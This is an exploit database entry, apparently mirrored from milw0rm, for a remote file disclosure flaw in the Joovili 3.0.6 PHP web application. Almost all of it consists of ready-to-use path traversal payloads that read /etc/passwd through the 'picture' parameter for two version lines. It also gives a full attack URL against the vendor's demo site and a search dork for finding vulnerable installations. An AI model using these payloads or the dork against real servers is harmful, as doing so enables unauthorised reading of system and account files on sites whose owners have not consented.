EXPLOITS

Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure

Author: EcHoLL
type: webapps
platform: php
port: 
date_added: 2007-12-26  
date_updated: 2016-11-24  
verified: 1  
codes: OSVDB-40153;CVE-2007-6621;OSVDB-39666;CVE-2007-6620  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 4799.txt  

found by EcHoLL
version: 2.***
include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE
include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE

version 3.**
joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE


demo
http://demo.joovili.com/include/joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE
dork: powered by joovili

# milw0rm.com [2007-12-27]